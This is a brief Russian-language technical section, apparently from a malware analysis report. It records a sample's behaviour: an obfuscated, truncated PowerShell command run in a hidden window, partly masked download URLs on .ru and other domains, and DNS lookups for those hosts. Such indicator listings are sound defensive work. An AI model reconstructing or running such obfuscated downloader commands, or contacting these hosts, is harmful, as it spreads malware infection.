Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -JoIn ('11T65_93i95M65Q110E127Q15>18i15i65%74a88a2T64>77%69%74i76>91M15T93E78T65Q75M64i66E20T11_119T119E88%70T120a15Q18_15T65%74%88L2L64E77%69L74Q76Q91E15E124Q86L92>91%74>66i1E97M74M91Q1a120_74...
- 'ik###etsoff.ru':80
- 're###dgeumc.org':80
- http://www.ik###etsoff.ru/MQ1qJe5Mjc/
- http://www.re###dgeumc.org/4qv7VLmHV/
- DNS ASK ik###etsoff.ru
- DNS ASK an###.pskovhelp.ru
- DNS ASK re###dgeumc.org
- DNS ASK bi######otoekspertiz.com
- DNS ASK ad###.##archlowestprice.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -JoIn ('11T65_93i95M65Q110E127Q15>18i15i65%74a88a2T64>77%69%74i76>91M15T93E78T65Q75M64i66E20T11_119T119E88%70T120a15Q18_15T65%74%88L2L64E77%69L74Q76Q91E15E124Q86L92>91%74>66i1E97M74M91Q1a120_74...' (со скрытым окном)